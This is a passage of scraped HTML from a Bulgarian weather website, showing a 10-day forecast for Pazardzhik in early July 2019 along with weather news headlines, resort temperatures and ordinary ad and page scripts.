<img src="https://m.netinfo.bg/sinoptik/icons/small/d240.png" width="48" height="49" class="wf10dayRightImg" alt="Облачно, дъжд с гръмотевици" title="Облачно, дъжд с гръмотевици" />
<span class="wf10dayRightTemp" title="Максимална температура">30°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">19°</span>
<span class="wf10dayRightWind" title="изток, лек полъх">
<span class="windImg10dayTopE"> </span>
1.9 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">59%</span>
<span class="wf10dayRighValue">3.4 mm</span>
<span class="wf10dayRighValue">75%</span>
<span class="wf10dayRighValue">46%</span>
<span class="wf10dayRighValue">-</span>
<span class="wf10dayRighValue">05:52 ч.</span>
<span class="wf10dayRighValue">21:01 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:09 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m4.png" width="37" height="38" title="Нарастващ полумесец" alt="Нарастващ полумесец" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Лъв</span>
<span class="wf10dayRighValue wf10dayDayLightValue">9%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.1</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/6" class="wf10dayRight wf10dayLastFive" title="Виж подробна прогноза">
<span class="wf10dayRightDay">Сб.</span>
<span class="wf10dayRightDate">06.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d100.png" width="48" height="49" class="wf10dayRightImg" alt="Предимно слънчево" title="Предимно слънчево" />
<span class="wf10dayRightTemp" title="Максимална температура">31°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">18°</span>
<span class="wf10dayRightWind" title="изток, лек полъх">
<span class="windImg10dayTopE"> </span>
1.8 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">33%</span>
<span class="wf10dayRighValue">0.3 mm</span>
<span class="wf10dayRighValue">19%</span>
<span class="wf10dayRighValue">30%</span>
<span class="wf10dayRighValue">-</span>
<span class="wf10dayRighValue">05:52 ч.</span>
<span class="wf10dayRighValue">21:01 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:09 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m5.png" width="37" height="38" title="Нарастващ полумесец" alt="Нарастващ полумесец" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Дева</span>
<span class="wf10dayRighValue wf10dayDayLightValue">17%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.14</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/7" class="wf10dayRight wf10dayLastFive" title="Виж подробна прогноза">
<span class="wf10dayRightDay">Нд.</span>
<span class="wf10dayRightDate">07.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d100.png" width="48" height="49" class="wf10dayRightImg" alt="Предимно слънчево" title="Предимно слънчево" />
<span class="wf10dayRightTemp" title="Максимална температура">33°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">17°</span>
<span class="wf10dayRightWind" title="северозапад, лек полъх">
<span class="windImg10dayTopNW"> </span>
1.9 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">18%</span>
<span class="wf10dayRighValue">0.0 mm</span>
<span class="wf10dayRighValue">36%</span>
<span class="wf10dayRighValue">12%</span>
<span class="wf10dayRighValue">-</span>
<span class="wf10dayRighValue">05:53 ч.</span>
<span class="wf10dayRighValue">21:01 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:08 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m6.png" width="37" height="38" title="Нарастващ полумесец" alt="Нарастващ полумесец" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Дева</span>
<span class="wf10dayRighValue wf10dayDayLightValue">27%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.17</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/8" class="wf10dayRight wf10dayLastFive" title="Виж подробна прогноза">
<span class="wf10dayRightDay">Пн.</span>
<span class="wf10dayRightDate">08.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d100.png" width="48" height="49" class="wf10dayRightImg" alt="Предимно слънчево" title="Предимно слънчево" />
<span class="wf10dayRightTemp" title="Максимална температура">34°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">18°</span>
<span class="wf10dayRightWind" title="север, лек полъх">
<span class="windImg10dayTopN"> </span>
2.0 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">15%</span>
<span class="wf10dayRighValue">0.0 mm</span>
<span class="wf10dayRighValue">0%</span>
<span class="wf10dayRighValue">10%</span>
<span class="wf10dayRighValue">-</span>
<span class="wf10dayRighValue">05:53 ч.</span>
<span class="wf10dayRighValue">21:01 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:07 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m7.png" width="37" height="38" title="Нарастващ полумесец" alt="Нарастващ полумесец" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Везни</span>
<span class="wf10dayRighValue wf10dayDayLightValue">38%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.21</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/9" class="wf10dayRight wf10dayLastFive" title="Виж подробна прогноза">
<span class="wf10dayRightDay">Вт.</span>
<span class="wf10dayRightDate">09.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d100.png" width="48" height="49" class="wf10dayRightImg" alt="Предимно слънчево" title="Предимно слънчево" />
<span class="wf10dayRightTemp" title="Максимална температура">34°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">19°</span>
<span class="wf10dayRightWind" title="северозапад, лек полъх">
<span class="windImg10dayTopNW"> </span>
2.3 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">18%</span>
<span class="wf10dayRighValue">0.0 mm</span>
<span class="wf10dayRighValue">19%</span>
<span class="wf10dayRighValue">11%</span>
<span class="wf10dayRighValue">-</span>
<span class="wf10dayRighValue">05:54 ч.</span>
<span class="wf10dayRighValue">21:00 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:05 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m8.png" width="37" height="38" title="Първа четвърт" alt="Първа четвърт" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Везни</span>
<span class="wf10dayRighValue wf10dayDayLightValue">49%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.25</span>
</a>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/10" class="wf10dayRight wf10dayLastFive" title="Виж подробна прогноза">
<span class="wf10dayRightDay">Ср.</span>
<span class="wf10dayRightDate">10.07.19</span>
<img src="https://m.netinfo.bg/sinoptik/icons/small/d100.png" width="48" height="49" class="wf10dayRightImg" alt="Предимно слънчево" title="Предимно слънчево" />
<span class="wf10dayRightTemp" title="Максимална температура">33°</span>
<span class="sep">—</span>
<span class="wf10dayRightTempLow" title="Минимална температура">18°</span>
<span class="wf10dayRightWind" title="юг, лек полъх">
<span class="windImg10dayTopS"> </span>
2.4 m/s </span>
<span class="wf10dayRighValue wf10dayRightRainValue">28%</span>
<span class="wf10dayRighValue">0.0 mm</span>
<span class="wf10dayRighValue">28%</span>
<span class="wf10dayRighValue">19%</span>
<span class="wf10dayRighValue">-</span>
<span class="wf10dayRighValue">05:55 ч.</span>
<span class="wf10dayRighValue">21:00 ч.</span>
<span class="wf10dayRighValue wf10dayDayLengthValue">15:04 ч.</span>
<span class="wf10dayRighValue wf10dayRightMoonPhaseValue"><img src="https://m.netinfo.bg/sinoptik/icons/moon/m9.png" width="37" height="38" title="Нарастваща полупълна" alt="Нарастваща полупълна" /></span>
<span class="wf10dayRighValue wf10dayZodiacValue">Везни</span>
<span class="wf10dayRighValue wf10dayDayLightValue">60%</span>
<span class="wf10dayRighValue wf10dayRightMoonCycleValue">0.28</span>
</a>
<div class="wf10dayGraphBlock">
<div class="wf10dayGraph" style="padding: 11px 0 0 14px; height: 170px;">
<div id="chart" align="center"> </div>
<script type="text/javascript">
var flashvars = {
'dataXML': "<chart bgColor='ffffff' baseFontColor='333333' labelPadding='0' valuePadding='8' yAxisValuesPadding='10' chartLeftMargin='10' chartRightMargin='10' chartBottomMargin='0' chartTopMargin='0' zeroPlaneColor='666666' zeroPlaneThickness='1' zeroPlaneAlpha='100' hoverCapBorderColor='848283' hoverCapBgColor='ffffff' showPlotBorder='1' plotBorderColor='fec007' plotBorderThickness='2' plotFillAngle='90' plotFillRatio='10,90' plotFillColor='fec007' plotfillalpha='60' plotGradientColor='ffffff' showLabels='0' showValues='1' showYAxisValues='0' showAnchors='1' anchorRadius='5' showBorder='0' setAdaptiveYMin='1' numberSuffix='°' vDivLineThickness='1' vDivlineColor='cccccc' vDivlineAlpha='20' vDivLineIsDashed='0' divLineIsDashed='1' divlinecolor='dddddd' divlinealpha='90' adjustDiv='1' canvasBorderThickness='2' canvaspadding='0' canvasBorderColor='ffffff' outcnvBaseFontColor='333333' alternateHGridAlpha='15' yAxisValuesStep='1' alternateHGridColor='ffffff' numVDivLines='8' canvasBgAlpha='0' bgAlpha='0,0' > <set toolText='' label='01.07.2019' value='33' /> <set toolText='' label='02.07.2019' value='35' /> <set toolText='' label='03.07.2019' value='37' /> <set toolText='' label='04.07.2019' value='34' /> <set toolText='' label='05.07.2019' value='30' /> <set toolText='' label='06.07.2019' value='31' /> <set toolText='' label='07.07.2019' value='33' /> <set toolText='' label='08.07.2019' value='34' /> <set toolText='' label='09.07.2019' value='34' /> <set toolText='' label='10.07.2019' value='33' /> <styles> <definition> <style name='fontStyleX' type='font' font='Georgia' size='12' color='2A2A2A' bold='1' isHTML='1'/> <style name='fontStyleY' type='font' font='Tahoma' size='9' color='666666' bold='1' isHTML='1'/> <style name='fontStyleTT' type='font' font='Georgia' size='14' borderColor='f1f1f1' color='333333' bold='1' isHTML='1'/> <style name='AnchorsXAnim' type='animation' param='_x' start='0' easing='strong' duration='1'/> <style name='AnchorsYAnim' type='animation' param='_y' start='0' easing='strong' duration='1'/> </definition> <application> <apply toObject='TOOLTIP' styles='fontStyleTT'/> <apply toObject='YAXISVALUES' styles='fontStyleY'/> <apply toObject='DATAVALUES' styles='fontStyleX'/> <apply toObject='DATALABELS' styles='fontStyleX'/> <apply toObject='ANCHORS' styles='AnchorsXAnim,AnchorsYAnim' /> </application> </styles></chart>"
};
var attributes = {};
swfobject.embedSWF("https://m5.netinfo.bg/sinoptik/swf/chart.swf", "chart", "470", "167", "9.0.0", false, flashvars, '', '');
</script>
</div>
<div class="wf10dayGraphDays">
<ul>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/1">Пн.</a>
<span>01.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/2">Вт.</a>
<span>02.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/3">Ср.</a>
<span>03.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/4">Чт.</a>
<span>04.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/5">Пт.</a>
<span>05.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/6">Сб.</a>
<span>06.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/7">Нд.</a>
<span>07.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/8">Пн.</a>
<span>08.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/9">Вт.</a>
<span>09.07.19</span>
</li>
<li>
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378/10-days/10">Ср.</a>
<span>10.07.19</span>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<a href="#" class="wfHideDetails wfHideDetailsDown" rel="Скрий детайли">
Покажи детайли</a>
</div>
<div id="grabo_b423"></div>
<!-- /157018629/Sinoptik.bg/Desktop/All_pages/Leaderboard/GraboFasha -->
<div id='div-gpt-ad-1553517775994-0'></div>
<!---- WEATHER FORECAST END -----> <script>
function showNative(obj) {
if (window.jQuery == undefined) {
return;
}
var lastElement = $('.wfNewsContentNews > .wfWeatherNews:last-child');
$(lastElement).find('a').attr('href', obj.url);
$(lastElement).find('a.imgLink > img').attr('src', obj.thumbSquared);
$(lastElement).find('h3>a').text(decodeURIComponent(obj.title));
$(lastElement).find('time').text('');
if ($(lastElement).find('.native-ad-source').length === 0) {
var sourceSiteLinkElement =
$('<p>', {'class': 'native-ad-source'}).append(
$('<a>', {'href': obj.url, 'target': '_blank'})
.text(obj.hostSite));
$(lastElement).append(sourceSiteLinkElement);
$('.native-ad-source>a').after('<img id="barcode" src="https://m4.netinfo.bg/vesti/img/card-native.png" />');
} else {
$(lastElement)
.find('.native-ad-source>p')
.text(obj.hostSite)
.attr('href', obj.url);
}
}
</script>
<!--new news block-->
<div class="wfNewsBlockNews">
<h2>
<a href="/news">За времето</a></h2>
<div class="wfNewsContentNews">
<!-- append news content here -->
<div class="wfWeatherNews news_number_0">
<a href="https://www.sinoptik.bg/news/slynchevo-i-goreshto-vreme-dnes-3072"
class="imgLink">
<img src="https://m5.netinfo.bg/media/images/38694/38694177/308-217-more.jpg" alt="Слънчево и горещо време днес"
width="178" height="105">
</a>
<h3>
<a href="https://www.sinoptik.bg/news/slynchevo-i-goreshto-vreme-dnes-3072"
>Слънчево и горещо време днес</a>
</h3>
<time>преди 39 минути</time>
</div>
<div class="wfWeatherNews news_number_1">
<a href="https://www.sinoptik.bg/news/temperaturen-rekord-vyv-franciia-3071"
class="imgLink">
<img src="https://m3.netinfo.bg/media/images/38665/38665281/308-217-goreshtina.jpg" alt="Температурен рекорд във Франция"
width="178" height="105">
</a>
<h3>
<a href="https://www.sinoptik.bg/news/temperaturen-rekord-vyv-franciia-3071"
>Температурен рекорд във Франция</a>
</h3>
<time>преди 2 дни</time>
</div>
<div class="wfWeatherNews news_number_2">
<a href="https://www.sinoptik.bg/news/nad-iuzhna-amerika-shte-ima-pylno-slynchevo-zatymnenie-3070"
class="imgLink">
<img src="https://m4.netinfo.bg/media/images/38662/38662712/308-217-zatymnenie.jpg" alt="Над Южна Америка ще има пълно слънчево затъмнение"
width="178" height="105">
</a>
<h3>
<a href="https://www.sinoptik.bg/news/nad-iuzhna-amerika-shte-ima-pylno-slynchevo-zatymnenie-3070"
>Над Южна Америка ще има пълно слънчево затъмнение</a>
</h3>
<time>преди 2 дни</time>
</div>
<div class="wfWeatherNews news_number_3">
<a href="https://www.sinoptik.bg/news/oblachno-vreme-v-petyk-3069"
class="imgLink">
<img src="https://m.netinfo.bg/media/images/38660/38660924/308-217-vreme.jpg" alt="Облачно време в петък"
width="178" height="105">
</a>
<h3>
<a href="https://www.sinoptik.bg/news/oblachno-vreme-v-petyk-3069"
>Облачно време в петък</a>
</h3>
<time>преди 3 дни</time>
</div>
<div class="wfWeatherNews news_number_4">
<a href="https://www.sinoptik.bg/news/globalnoto-zatopliane-razrushava-skalite-v-alpite-3068"
class="imgLink">
<img src="https://m3.netinfo.bg/media/images/38650/38650691/308-217-alpi.jpg" alt="Глобалното затопляне разрушава скалите в Алпите"
width="178" height="105">
</a>
<h3>
<a href="https://www.sinoptik.bg/news/globalnoto-zatopliane-razrushava-skalite-v-alpite-3068"
>Глобалното затопляне разрушава скалите в Алпите</a>
</h3>
<time>преди 3 дни</time>
</div>
<div class="wfWeatherNews news_number_5">
<a href="https://www.sinoptik.bg/news/izrigna-vulkanyt-ulavun-3067"
class="imgLink">
<img src="https://m4.netinfo.bg/media/images/38649/38649652/308-217-vulkan.jpg" alt="Изригна вулканът Улавун"
width="178" height="105">
</a>
<h3>
<a href="https://www.sinoptik.bg/news/izrigna-vulkanyt-ulavun-3067"
>Изригна вулканът Улавун</a>
</h3>
<time>преди 3 дни</time>
</div>
</div>
</div>
<!--new news block-->
<!-- /157018629/Sinoptik.bg/Desktop/All_pages/Native_ads/Native -->
<div id='div-gpt-ad-1548159765907-0' style='height:1px; width:1px;'></div>
<!-- NEWS BLOCK BEGIN -->
<iframe style="width:640px; height: 563px;"
src="https://bimg.abv.bg/banners/inhouse/sinoptik/news_blok/block_news.html?bimg"
scrolling="no" frameborder="no"></iframe>
<!-- NEWS BLOCK END -->
<div style="margin-bottom: 20px;">
<div id='div-gpt-ad-1526903420347-2'>
</div>
</div>
<!-- PHOTO AND VIDEO OF THE DAY BEGIN -->
<div class="wfNewsBlock">
<h2>
<a href="https://www.sinoptik.bg/photo/bybreka-531">
Снимка на деня</a>
</h2>
<div class="photoContent">
<div class="photo-wrapper" style="text-align:center;height:auto;margin:0 auto">
<a class="photoZoom" href="https://www.sinoptik.bg/photo/bybreka-531?view=full" style="width:616px;height:auto">
<img class="loaderPgImg" src="https://m3.netinfo.bg/media/images/38662/38662441/r-616-401-bybreka.jpg" alt="Бъбрека" />
</a>
</div>
<div class="photoInfo">
<p>Езерото Бъбрека посреща лятото с усмивка.</p>
<span class="photoInfoAuthor">
<b>Автор:</b>
Галя Иванова </span>
</div>
<div class="shareVidSource clearfix">
<div class="share-block-sinoptik small-share-btn">
<a class="gtm-ShareBlock-Facebook-click facebook-share-sinoptik" alt="Сподели с Facebook"
target="_blank"
onclick="javascript:window.open(this.href, '', 'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=300,width=600');return false;" href="https://www.facebook.com/sharer/sharer.php?u=https://www.sinoptik.bg/photo/bybreka-531">
<span class="facebookShareNumber"></span>
</a>
</div>
<a class="more-photos" href="https://www.sinoptik.bg/photo/bybreka-531">
Виж всички
</a>
</div>
</div>
</div>
<!-- PHOTO AND VIDEO OF THE DAY END -->
</div>
<!---- MAIN BLOCK END ----->
<div class="rightBlock">
<script type="text/javascript">
function showBanner(id, height) {
$('#banner-' + id).show();
}
</script>
<div class="rightBanner">
<!-- /157018629/Sinoptik.bg/Desktop/All_pages/Rectangle/ATF -->
<div id='div-gpt-ad-1526903420347-4'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1526903420347-4'); });
</script>
</div>
<center>
<!-- <script>
//create fake element, that will be removed by AdBlocker
var test = document.createElement('div');
test.innerHTML = ' ';
test.className = 'adsbox';
document.body.appendChild(test);
setTimeout(function(){ doFallback(); },2000);
//if that element is remved - show Adwise
function doFallback(){
if ($('.adsbox').length<3) {
adwise_w = 300;
adwise_h = 250;
adwise_publisher_id = 2307;
adwise_channel_id = 1;
adwise_ads = 2;
document.write('<script type="text/javascript" src="//i.adwise.bg/context/context-0.1.js"><\/script>');
}
}
</script>-->
</center>
</div> <div class="vestiNews">
<h2>
<a href="https://www.sinoptik.bg/video">
Видео</a>
</h2>
<div class="pvDContent">
<a id="homePlayer"
href="https://www.sinoptik.bg/video/prognoza-za-vremeto-30.06.2019-centralna-emisiia-82625"
class="imgLink imgVideoLink">
<img src="https://m3.netinfo.bg/media/images/38689/38689855/308-217-prognoza-za-vremeto-30-06-2019-centralna-emisiia.jpg" alt="Прогноза за времето (30.06.2019 - централна емисия)"
width="298" height="217">
<img src="https://m.netinfo.bg/sinoptik/images/sinoptikVideoHoverMid.png" width="69" height="71"
class="imgVideoLinkHover"
alt="">
</a>
<h3>
<a href="https://www.sinoptik.bg/video/prognoza-za-vremeto-30.06.2019-centralna-emisiia-82625">
Прогноза за времето (30.06.2019 - централна емисия)</a>
</h3>
</div>
</div>
<div class="resorts">
<h2>Последно посетени</h2>
<div class="resortsContent">
<a href="https://www.sinoptik.bg/pazardzhik-bulgaria-100728378" class="resortsRow" title="Виж прогноза за времето в Пазарджик">
<span class="resortName">Пазарджик</span>
<span class="resortTemp">14° | <span>33°</span></span>
<img src="https://m5.netinfo.bg/sinoptik/icons/tiny/d000.png" alt="Слънчево" width="35" height="33" class="resortCondImg" title="Слънчево" />
</a>
</div>
</div> <div class="vestiNews">
<h2><a href="https://www.sinoptik.bg/resorts">Курорти</a></h2>
<div class="resortsContent">
<a href="https://www.sinoptik.bg/varna-bulgaria-100726050" class="resortsRow" title="Виж прогноза за времето в Варна">
<span class="resortName">Варна</span>
<span class="resortTemp">19° | <span>29°</span></span>
<img src="https://m5.netinfo.bg/sinoptik/icons/tiny/d000.png" alt="Слънчево" width="35" height="33" class="resortCondImg" title="Слънчево" />
</a>
<a href="https://www.sinoptik.bg/burgas-bulgaria-100732770" class="resortsRow" title="Виж прогноза за времето в Бургас">
<span class="resortName">Бургас</span>
<span class="resortTemp">17° | <span>29°</span></span>
<img src="https://m5.netinfo.bg/sinoptik/icons/tiny/d000.png" alt="Слънчево" width="35" height="33" class="resortCondImg" title="Слънчево" />
</a>
<a href="https://www.sinoptik.bg/akhtopol-bulgaria-100733722" class="resortsRow" title="Виж прогноза за времето в Ахтопол">
<span class="resortName">Ахтопол</span>
<span class="resortTemp">16° | <span>27°</span></span>
<img src="https://m5.netinfo.bg/sinoptik/icons/tiny/d000.png" alt="Слънчево" width="35" height="33" class="resortCondImg" title="Слънчево" />
</a>
<a href="https://www.sinoptik.bg/golden-sands-bulgaria-106355004" class="resortsRow" title="Виж прогноза за времето в Златни пясъци">
<span class="resortName">Златни пясъци</span>
<span class="resortTemp">19° | <span>30°</span></span>
<img src="https://m5.netinfo.bg/sinoptik/icons/tiny/d000.png" alt="Слънчево" width="35" height="33" class="resortCondImg" title="Слънчево" />
</a>
<a href="https://www.sinoptik.bg/sunny-beach-bulgaria-106355005" class="resortsRow" title="Виж прогноза за времето в Слънчев бряг">
<span class="resortName">Слънчев бряг</span>
<span class="resortTemp">15° | <span>30°</span></span>
<img src="https://m5.netinfo.bg/sinoptik/icons/tiny/d000.png" alt="Слънчево" width="35" height="33" class="resortCondImg" title="Слънчево" />
</a>
</div>
</div> <div class="rightBottomBanner" style="margin-bottom: 20px;">
<div id="div-gpt-ad-1526903420347-5"></div>
</div> <!-- /157018629/Sinoptik.bg/Desktop/All_pages/Rectangle/BTF2 -->
<div id='div-gpt-ad-1526903420347-6'>
</div> <div class="vestiNews">
<h2><a href="https://gong.bg" target="blank">Новини от Gong.bg</a></h2>
<div class="vestiContent">
<div class="vestiRow">
<a href="https://gong.bg/bg-football/parva-liga/travmata-na-rafael-enrike-ne-e-seriozna-548678" target="blank" class="imgLink vestiLink" rel="1">
<img src="https://m5.netinfo.bg/media/images/35273/35273512/50-50-rafael-enrike.jpg"
width="50" height="50"/>
</a>
<h3>
<a href="https://gong.bg/bg-football/parva-liga/travmata-na-rafael-enrike-ne-e-seriozna-548678" target="blank" class="vestiLink"
rel="1">Травмата на Рафаел Енрике не е сериозна</a>
</h3>
<div class="commSeen">
<span>Преди 3 минути</span>
<span class="sep">|</span>
<a href="https://gong.bg/bg-football/parva-liga/travmata-na-rafael-enrike-ne-e-seriozna-548678" target="blank" class="seenImg vestiLink"
rel="1"></a>
<span class="commSeen">0</span>
</div>
</div>
<div class="vestiRow">
<a href="https://gong.bg/basketball/eurobasket/ispaniia-franciia-i-syrbiia-bez-zaguba-v-grupite-na-evrobasket-2019-548677" target="blank" class="imgLink vestiLink" rel="2">
<img src="https://m4.netinfo.bg/media/images/38694/38694181/50-50-basketbol-ispaniia-zheni.jpg"
width="50" height="50"/>
</a>
<h3>
<a href="https://gong.bg/basketball/eurobasket/ispaniia-franciia-i-syrbiia-bez-zaguba-v-grupite-na-evrobasket-2019-548677" target="blank" class="vestiLink"
rel="2">Испания, Франция и Сърбия без загуба в групите на Евробаскет 2019</a>
</h3>
<div class="commSeen">
<span>Преди 16 минути</span>
<span class="sep">|</span>
<a href="https://gong.bg/basketball/eurobasket/ispaniia-franciia-i-syrbiia-bez-zaguba-v-grupite-na-evrobasket-2019-548677" target="blank" class="seenImg vestiLink"
rel="2"></a>
<span class="commSeen">13</span>
</div>
</div>
<div class="vestiRow">
<a href="https://gong.bg/football-sviat/drugi/nova-tragediia-shvejcarska-nacionalka-izchezna-v-ezero-548676" target="blank" class="imgLink vestiLink" rel="3">
<img src="https://m5.netinfo.bg/media/images/38694/38694178/50-50-floriana-ismaili.jpg"
width="50" height="50"/>
</a>
<h3>
<a href="https://gong.bg/football-sviat/drugi/nova-tragediia-shvejcarska-nacionalka-izchezna-v-ezero-548676" target="blank" class="vestiLink"
rel="3">Нова трагедия! Швейцарска националка изчезна безследно в езерото Комо</a>
</h3>
<div class="commSeen">
<span>Преди 18 минути</span>
<span class="sep">|</span>
<a href="https://gong.bg/football-sviat/drugi/nova-tragediia-shvejcarska-nacionalka-izchezna-v-ezero-548676" target="blank" class="seenImg vestiLink"
rel="3"></a>
<span class="commSeen">69</span>
</div>
</div>
<div class="vestiSeeMore">
<span>виж още:</span>
<a href="https://gong.bg" target="blank">Новини</a>
<span class="sep">|</span>
<a href="https://gong.bg/livescore" target="blank">Livescore</a>
</div>
</div>
</div> <!-- PROMO WIDGET -->
<a href="https://www.sinoptik.bg/widgets" class="promoWidgetLink" style="display:none">
<img src="https://m.netinfo.bg/sinoptik/images/widgetsPromo.png" width="300" height="203"
alt="Прогноза за времето на Вашия сайт"/>
</a>
<script type="text/javascript">
$(document).ready(function () {
if (($('.mainBlock').height() - $('.rightBlock').height()) > 320) {
$('.promoWidgetLink').show(300);
}
;
});
</script>
<!-- PROMO WIDGET -->
<div style="margin-top: 20px">
<a href="https://www.sinoptik.bg/moon-phase">
<img src="https://m.netinfo.bg/sinoptik/images/moon-phases.jpg" alt="Фаза на луната и лунен календар">
</a>
</div> </div> <!---- BOTTOM BANNER BEGIN ----->
<div class="bottomBanner">
<div id="banner">
<!-- /157018629/Sinoptik.bg/Desktop/All_pages/Leaderboard/BTF2 -->
<div id='div-gpt-ad-1526903420347-3'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1526903420347-3'); });
</script>
</div>
</div>
</div>
<!---- BOTTOM BANNER END ----->
</div>
<!---- CONTAINER END ----->
<!---- FOOTER BEGIN ----->
<footer>
<div class="clearfix">
<div class="niSitesBlock">
<div class="niSites">
<span class="niSiteTitle">Да организирам</span>
<div>
<a href="https://www.abv.bg/" target="_blank">АБВ Поща</a><br/>
<a href="https://ndox.abv.bg/" target="_blank">DOX</a><br/>
<a href="https://apps.abv.bg/" target="_blank">АБВ на твой домейн</a>
</div>
</div>
<div class="niSites">
<span class="niSiteTitle">Да намирам</span>
<div>
<a href="https://www.gbg.bg/" target="_blank">Гювеч</a><span
class="sep">|</span>
<a href="https://broshura.bg" target="_blank">Брошури</a><br/>
<a href="https://www.sravni.bg/" target="_blank">Сравни</a><br/>
<a href="https://www.carmarket.bg/" target="_blank">Автомобили</a>
</div>
</div>
<div class="niSites">
<span class="niSiteTitle">Да се информирам</span>
<div>
<a href="https://www.vesti.bg/" target="_blank">Новини</a><span
class="sep">|</span>
<a href="https://gong.bg/" target="_blank">Спорт</a><br/>
<a href="https://www.pariteni.bg/" target="_blank">Пари</a><span
class="sep">|</span>
<a href="https://www.sinoptik.bg/" target="_blank">Времето</a><br/>
<a href="https://www.edna.bg/" target="_blank">За жените</a>
</div>
</div>
<div class="niSites">
<span class="niSiteTitle">Да се забавлявам</span>
<div>
<a href="https://www.vbox7.com/" target="_blank">Видео</a><span
class="sep">|</span>
<a href="https://www.vgames.bg/" target="_blank">Игри</a><br/>
<a href="http://www.vmusic.bg/" target="_blank">Музика</a><br/>
<a href="https://www.vcards.bg/" target="_blank">Картички</a>
</div>
</div>
</div>
<div class="niLinks">
<ul class="clearfix">
<li><a href="http://www.netinfocompany.bg/media-kit/sinoptikbg-78"
target="_blank">За реклама</a><span class="sep">|</span></li>
<li><a href="https://adwise.bg/" target="_blank">Реклама на клик</a></li>
</ul>
<ul class="clearfix">
<li><a href="http://info.netinfocompany.bg/about-company"
target="_blank">За нас</a><span class="sep">|</span></li>
<li><a href="http://info.netinfocompany.bg/portfolio"
target="_blank">Портфолио</a><span class="sep">|</span></li>
<li><a href="http://info.netinfocompany.bg/contacts/?s=sinoptik"
target="_blank">Пишете ни</a><span class="sep">|</span></li>
<li><a href="http://www.sinoptik.bg/sinoptik-terms.pdf"
target="_blank">Общи условия</a><span class="sep">|</span></li>
<li><a href="https://www.netinfocompany.bg/gdpr/" target="_blank">Поверителност</a><span
class="sep">|</span></li>
<li><a href="http://foreca.com/" target="_blank" rel="nofollow">Времето от <span><img
src="https://m.netinfo.bg/sinoptik/images/foreca.png" alt="Foreca" width="50" height="12"/></span></a></li>
</ul>
<div class="site-privacy">
<a class="trigger-faktorio" href="javascript:;"><span>Вашите лични данни</span></a>
<a class="trigger-gdpr" href="https://www.netinfocompany.bg/gdpr/" target="_blank"><span>Поверителност</span></a>
<a class="trigger-onesignal" href="javascript:;"><span>Известия</span></a>
</div>
<script>
// GDPR
$('.site-privacy .trigger-faktorio').on('click', function (e) {
e.preventDefault();
$('#fingerprint').trigger('click');
});
$('.site-privacy .trigger-onesignal').on('click', function (e) {
e.preventDefault();
$('.onesignal-bell-launcher-button').toggleClass('visible');
